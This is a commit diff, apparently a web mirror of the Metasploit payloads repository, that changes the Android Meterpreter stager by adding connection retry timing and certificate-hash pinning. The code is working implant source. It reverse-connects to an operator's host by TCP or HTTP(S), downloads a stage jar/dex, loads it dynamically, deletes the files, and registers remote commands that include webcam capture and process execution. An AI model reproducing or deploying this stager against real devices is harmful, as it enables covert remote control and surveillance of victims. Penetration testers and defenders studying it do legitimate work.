1
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-12-21 05:35:54 +01:00

Land #36, initial http retry and cert validation support

This commit is contained in:
Brent Cook 2015-05-26 22:42:45 -05:00
commit 97bda0ac40
7 changed files with 171 additions and 113 deletions

View File

@ -2,31 +2,31 @@ package com.metasploit.stage;
import android.content.Context; import android.content.Context;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream; import java.io.DataInputStream;
import java.io.DataOutputStream; import java.io.DataOutputStream;
import java.io.File; import java.io.File;
import java.io.FileOutputStream; import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream; import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.Socket; import java.net.Socket;
import java.net.URL; import java.net.URL;
import java.net.URLConnection; import java.net.URLConnection;
import java.util.Random; import java.util.concurrent.TimeUnit;
import javax.net.ssl.HttpsURLConnection;
import dalvik.system.DexClassLoader; import dalvik.system.DexClassLoader;
public class Payload { public class Payload {
public static final String LHOST = "XXXX127.0.0.1 "; public static final String URL = "ZZZZ ";
public static final String LPORT = "YYYY4444 "; public static final String CERT_HASH = "WWWW ";
public static final String URL = "ZZZZ "; public static final String LHOST = "XXXX127.0.0.1 ";
public static final String TRIALS = "TTTT "; public static final String LPORT = "YYYY4444 ";
public static final String RETRY_TOTAL = "TTTT ";
public static final String RETRY_WAIT = "SSSS ";
private static final int URI_CHECKSUM_INITJ = 88; public static long retry_total;
private static final String AB = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; public static long retry_wait;
private static final Random rnd = new Random();
private static String[] parameters; private static String[] parameters;
@ -55,96 +55,63 @@ public class Payload {
String path = currentDir.getAbsolutePath(); String path = currentDir.getAbsolutePath();
parameters = new String[]{path}; parameters = new String[]{path};
} }
int nTrials = Integer.parseInt(TRIALS.substring(4).trim()); int retryTotal;
while (!startReverseConn() && nTrials-- > 0) { int retryWait;
try {
Thread.sleep(60000);
} catch (InterruptedException e) {
}
}
}
private static boolean startReverseConn() {
try { try {
if (URL.substring(4).trim().length() == 0) { retryTotal = Integer.parseInt(RETRY_TOTAL.substring(4).trim());
reverseTCP(); retryWait = Integer.parseInt(RETRY_WAIT.substring(4).trim());
} else { } catch (NumberFormatException e) {
reverseHTTP(); return;
}
long payloadStart = System.currentTimeMillis();
retry_total = TimeUnit.SECONDS.toMillis(retryTotal);
retry_wait = TimeUnit.SECONDS.toMillis(retryWait);
while (System.currentTimeMillis() < payloadStart + retry_total) {
try {
if (URL.substring(4).trim().length() == 0) {
reverseTCP();
} else {
reverseHTTP();
}
return;
} catch (Exception e) {
e.printStackTrace();
}
try {
Thread.sleep(retry_wait);
} catch (InterruptedException e) {
return;
} }
return true;
} catch (Exception e) {
return false;
} }
} }
private static String randomString(int len) {
StringBuilder sb = new StringBuilder(len);
for (int i = 0; i < len; i++) {
sb.append(AB.charAt(rnd.nextInt(AB.length())));
}
return sb.toString();
}
private static int checksumText(String s) {
int tmp = 0;
for (int i = 0; i < s.length(); i++) {
tmp += (int) s.charAt(i);
}
return tmp % 0x100;
}
private static void reverseHTTP() throws Exception { private static void reverseHTTP() throws Exception {
int checksum;
String URI;
HttpURLConnection urlConn;
String lurl = URL.substring(4).trim(); String lurl = URL.substring(4).trim();
InputStream inStream;
while (true) {
URI = randomString(4);
checksum = checksumText(URI);
if (checksum == URI_CHECKSUM_INITJ)
break;
}
String FullURI = "/" + URI;
URL url = new URL(lurl + FullURI + "_" + randomString(16));
if (lurl.startsWith("https")) { if (lurl.startsWith("https")) {
urlConn = (HttpsURLConnection) url.openConnection(); URLConnection uc = new URL(lurl).openConnection();
Class.forName("com.metasploit.stage.PayloadTrustManager") Class.forName("com.metasploit.stage.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, uc);
.getMethod("useFor", new Class[]{URLConnection.class}) inStream = uc.getInputStream();
.invoke(null, new Object[]{urlConn});
} else { } else {
urlConn = (HttpURLConnection) url.openConnection(); inStream = new URL(lurl).openStream();
} }
OutputStream out = new ByteArrayOutputStream();
urlConn.setDoInput(true); DataInputStream in = new DataInputStream(inStream);
urlConn.setRequestMethod("GET"); loadStage(in, out, parameters);
urlConn.connect();
DataInputStream in = new DataInputStream(urlConn.getInputStream());
loadStage(in, null, parameters);
urlConn.disconnect();
} }
private static void reverseTCP() { private static void reverseTCP() throws Exception {
try { String lhost = LHOST.substring(4).trim();
String lhost = LHOST.substring(4).trim(); String lport = LPORT.substring(4).trim();
String lport = LPORT.substring(4).trim(); Socket msgsock = new Socket(lhost, Integer.parseInt(lport));
Socket msgsock = new Socket(lhost, Integer.parseInt(lport)); DataInputStream in = new DataInputStream(msgsock.getInputStream());
DataInputStream in = new DataInputStream(msgsock.getInputStream()); OutputStream out = new DataOutputStream(msgsock.getOutputStream());
OutputStream out = new DataOutputStream(msgsock.getOutputStream()); loadStage(in, out, parameters);
loadStage(in, out, parameters);
} catch (Exception e) {
e.printStackTrace();
}
} }
private static void loadStage(DataInputStream in, OutputStream out, String[] parameters) throws Exception { private static void loadStage(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
String path = parameters[0]; String path = parameters[0];
String filePath = path + File.separatorChar + "payload.jar"; String filePath = path + File.separatorChar + "payload.jar";
String dexPath = path + File.separatorChar + "payload.dex"; String dexPath = path + File.separatorChar + "payload.dex";
@ -176,9 +143,8 @@ public class Payload {
final Object stage = myClass.newInstance(); final Object stage = myClass.newInstance();
file.delete(); file.delete();
new File(dexPath).delete(); new File(dexPath).delete();
myClass.getMethod( myClass.getMethod("start",
"start", new Class[]{DataInputStream.class, OutputStream.class, String[].class})
new Class[]{DataInputStream.class, OutputStream.class, String[].class}).invoke(stage, .invoke(stage, in, out, parameters);
new Object[]{in, out, parameters});
} }
} }

View File

@ -42,6 +42,10 @@ import javax.net.ssl.SSLSession;
import javax.net.ssl.TrustManager; import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager; import javax.net.ssl.X509TrustManager;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.cert.CertificateEncodingException;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate; import java.security.cert.X509Certificate;
/** /**
@ -57,14 +61,49 @@ public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
return new X509Certificate[0]; return new X509Certificate[0];
} }
public static String getCertificateSHA1(X509Certificate cert)
throws NoSuchAlgorithmException, CertificateEncodingException {
MessageDigest md = MessageDigest.getInstance("SHA-1");
md.update(cert.getEncoded());
return bytesToHex(md.digest());
}
public static String bytesToHex(byte bytes[]) {
char[] hexDigits = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
StringBuilder buf = new StringBuilder(bytes.length * 2);
for (byte aByte : bytes) {
buf.append(hexDigits[(aByte & 0xf0) >> 4]);
buf.append(hexDigits[aByte & 0x0f]);
}
return buf.toString();
}
public void checkClientTrusted(java.security.cert.X509Certificate[] certs, public void checkClientTrusted(java.security.cert.X509Certificate[] certs,
String authType) { String authType) {
// trust everyone // trust everyone
} }
public void checkServerTrusted(java.security.cert.X509Certificate[] certs, public void checkServerTrusted(java.security.cert.X509Certificate[] certs,
String authType) { String authType) throws CertificateException {
// trust everyone
String payloadHash = Payload.CERT_HASH.substring(4).trim();
if (payloadHash.length() == 0) {
// No HandlerSSLCert set on payload, trust everyone
return;
}
if (certs == null || certs.length < 1) {
throw new CertificateException();
}
for (X509Certificate certificate : certs) {
try {
String serverHash = getCertificateSHA1(certificate);
if (!serverHash.equals(payloadHash)) {
throw new CertificateException("Invalid certificate");
}
} catch (Exception e) {
throw new CertificateException(e);
}
}
} }
public boolean verify(String hostname, SSLSession session) { public boolean verify(String hostname, SSLSession session) {

View File

@ -32,6 +32,12 @@
<artifactId>Metasploit-Java-Meterpreter-stdapi</artifactId> <artifactId>Metasploit-Java-Meterpreter-stdapi</artifactId>
<version>${project.version}</version> <version>${project.version}</version>
</dependency> </dependency>
<dependency>
<groupId>com.metasploit</groupId>
<artifactId>Metasploit-AndroidPayload</artifactId>
<version>${project.version}</version>
<scope>provided</scope>
</dependency>
</dependencies> </dependencies>
<build> <build>
<finalName>${project.artifactId}</finalName> <finalName>${project.artifactId}</finalName>

View File

@ -17,6 +17,7 @@ import com.metasploit.meterpreter.android.webcam_get_frame_android;
import com.metasploit.meterpreter.android.webcam_list_android; import com.metasploit.meterpreter.android.webcam_list_android;
import com.metasploit.meterpreter.android.webcam_start_android; import com.metasploit.meterpreter.android.webcam_start_android;
import com.metasploit.meterpreter.android.webcam_stop_android; import com.metasploit.meterpreter.android.webcam_stop_android;
import com.metasploit.meterpreter.core.core_transport_set_timeouts;
import com.metasploit.meterpreter.stdapi.Loader; import com.metasploit.meterpreter.stdapi.Loader;
import com.metasploit.meterpreter.stdapi.channel_create_stdapi_fs_file; import com.metasploit.meterpreter.stdapi.channel_create_stdapi_fs_file;
import com.metasploit.meterpreter.stdapi.channel_create_stdapi_net_tcp_client; import com.metasploit.meterpreter.stdapi.channel_create_stdapi_net_tcp_client;
@ -42,45 +43,44 @@ import com.metasploit.meterpreter.stdapi.stdapi_sys_process_execute_V1_3;
import java.io.DataInputStream; import java.io.DataInputStream;
import java.io.File; import java.io.File;
import java.io.OutputStream; import java.io.OutputStream;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method; import java.lang.reflect.Method;
public class AndroidMeterpreter extends Meterpreter { public class AndroidMeterpreter extends Meterpreter {
private static final Object contextWaiter = new Object();
private static String writeableDir; private static String writeableDir;
private static Context context; private static Context context;
private void startExecutingOnThread() {
new Thread() {
@Override
public void run() {
try {
startExecuting();
} catch (Exception e) {
e.printStackTrace();
}
}
}.start();
}
private void findContext() throws Exception { private void findContext() throws Exception {
final Class<?> activityThreadClass = Class.forName("android.app.ActivityThread"); Class<?> activityThreadClass;
try {
activityThreadClass = Class.forName("android.app.ActivityThread");
} catch (ClassNotFoundException e) {
// No context (running as root?)
return;
}
final Method currentApplication = activityThreadClass.getMethod("currentApplication"); final Method currentApplication = activityThreadClass.getMethod("currentApplication");
context = (Context) currentApplication.invoke(null, (Object[]) null); context = (Context) currentApplication.invoke(null, (Object[]) null);
if (context == null) { if (context == null) {
Handler handler = new Handler(Looper.getMainLooper()); // Post to the UI/Main thread and try and retrieve the Context
final Handler handler = new Handler(Looper.getMainLooper());
handler.post(new Runnable() { handler.post(new Runnable() {
@Override
public void run() { public void run() {
try { try {
context = (Context) currentApplication.invoke(null, (Object[]) null); context = (Context) currentApplication.invoke(null, (Object[]) null);
} catch (Exception e) { } catch (Exception e) {
e.printStackTrace(); e.printStackTrace();
} }
startExecutingOnThread(); synchronized (contextWaiter) {
contextWaiter.notify();
}
} }
}); });
} else { synchronized (contextWaiter) {
startExecuting(); contextWaiter.wait();
}
} }
} }
@ -95,8 +95,13 @@ public class AndroidMeterpreter extends Meterpreter {
findContext(); findContext();
} catch (Exception e) { } catch (Exception e) {
e.printStackTrace(); e.printStackTrace();
startExecuting();
} }
startExecuting();
}
@Override
protected String getPayloadTrustManager() {
return "com.metasploit.stage.PayloadTrustManager";
} }
@Override @Override
@ -104,6 +109,7 @@ public class AndroidMeterpreter extends Meterpreter {
getCommandManager().resetNewCommands(); getCommandManager().resetNewCommands();
CommandManager mgr = getCommandManager(); CommandManager mgr = getCommandManager();
Loader.cwd = new File(writeableDir); Loader.cwd = new File(writeableDir);
mgr.registerCommand("core_transport_set_timeouts", core_transport_set_timeouts.class);
mgr.registerCommand("channel_create_stdapi_fs_file", channel_create_stdapi_fs_file.class); mgr.registerCommand("channel_create_stdapi_fs_file", channel_create_stdapi_fs_file.class);
mgr.registerCommand("channel_create_stdapi_net_tcp_client", channel_create_stdapi_net_tcp_client.class); mgr.registerCommand("channel_create_stdapi_net_tcp_client", channel_create_stdapi_net_tcp_client.class);
mgr.registerCommand("channel_create_stdapi_net_tcp_server", channel_create_stdapi_net_tcp_server.class); mgr.registerCommand("channel_create_stdapi_net_tcp_server", channel_create_stdapi_net_tcp_server.class);

View File

@ -0,0 +1,24 @@
package com.metasploit.meterpreter.core;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.TLVType;
import com.metasploit.meterpreter.command.Command;
import com.metasploit.stage.Payload;
import java.util.concurrent.TimeUnit;
public class core_transport_set_timeouts implements Command {
public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
Integer retryTotal = (Integer)request.getValue(TLVType.TLV_TYPE_TRANS_RETRY_TOTAL, null);
Integer retryWait = (Integer)request.getValue(TLVType.TLV_TYPE_TRANS_RETRY_WAIT, null);
if (retryTotal != null) {
Payload.retry_total = TimeUnit.SECONDS.toMillis(retryTotal.intValue());
}
if (retryWait != null) {
Payload.retry_wait = TimeUnit.SECONDS.toMillis(retryWait.intValue());
}
return ERROR_SUCCESS;
}
}

View File

@ -106,6 +106,10 @@ public class Meterpreter {
} }
} }
protected String getPayloadTrustManager() {
return "com.metasploit.meterpreter.PayloadTrustManager";
}
/** /**
* Write a TLV packet to this meterpreter's output stream. * Write a TLV packet to this meterpreter's output stream.
* *
@ -188,7 +192,7 @@ public class Meterpreter {
// load the trust manager via reflection, to avoid loading // load the trust manager via reflection, to avoid loading
// it when it is not needed (it requires Sun Java 1.4+) // it when it is not needed (it requires Sun Java 1.4+)
try { try {
Class.forName("com.metasploit.meterpreter.PayloadTrustManager").getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc}); Class.forName(getPayloadTrustManager()).getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
} catch (Exception ex) { } catch (Exception ex) {
ex.printStackTrace(getErrorStream()); ex.printStackTrace(getErrorStream());
} }

View File

@ -43,6 +43,19 @@ public interface TLVType {
public static final int TLV_TYPE_MIGRATE_PID = TLVPacket.TLV_META_TYPE_UINT | 402; public static final int TLV_TYPE_MIGRATE_PID = TLVPacket.TLV_META_TYPE_UINT | 402;
public static final int TLV_TYPE_MIGRATE_LEN = TLVPacket.TLV_META_TYPE_UINT | 403; public static final int TLV_TYPE_MIGRATE_LEN = TLVPacket.TLV_META_TYPE_UINT | 403;
public static final int TLV_TYPE_TRANS_TYPE = TLVPacket.TLV_META_TYPE_UINT | 430;
public static final int TLV_TYPE_TRANS_URL = TLVPacket.TLV_META_TYPE_STRING | 431;
public static final int TLV_TYPE_TRANS_UA = TLVPacket.TLV_META_TYPE_STRING | 432;
public static final int TLV_TYPE_TRANS_COMM_TIMEOUT = TLVPacket.TLV_META_TYPE_UINT | 433;
public static final int TLV_TYPE_TRANS_SESSION_EXP = TLVPacket.TLV_META_TYPE_UINT | 434;
public static final int TLV_TYPE_TRANS_CERT_HASH = TLVPacket.TLV_META_TYPE_RAW | 435;
public static final int TLV_TYPE_TRANS_PROXY_HOST = TLVPacket.TLV_META_TYPE_STRING | 436;
public static final int TLV_TYPE_TRANS_PROXY_USER = TLVPacket.TLV_META_TYPE_STRING | 437;
public static final int TLV_TYPE_TRANS_PROXY_PASS = TLVPacket.TLV_META_TYPE_STRING | 438;
public static final int TLV_TYPE_TRANS_RETRY_TOTAL = TLVPacket.TLV_META_TYPE_UINT | 439;
public static final int TLV_TYPE_TRANS_RETRY_WAIT = TLVPacket.TLV_META_TYPE_UINT | 440;
public static final int TLV_TYPE_TRANS_GROUP = TLVPacket.TLV_META_TYPE_GROUP | 441;
public static final int TLV_TYPE_CIPHER_NAME = TLVPacket.TLV_META_TYPE_STRING | 500; public static final int TLV_TYPE_CIPHER_NAME = TLVPacket.TLV_META_TYPE_STRING | 500;
public static final int TLV_TYPE_CIPHER_PARAMETERS = TLVPacket.TLV_META_TYPE_GROUP | 501; public static final int TLV_TYPE_CIPHER_PARAMETERS = TLVPacket.TLV_META_TYPE_GROUP | 501;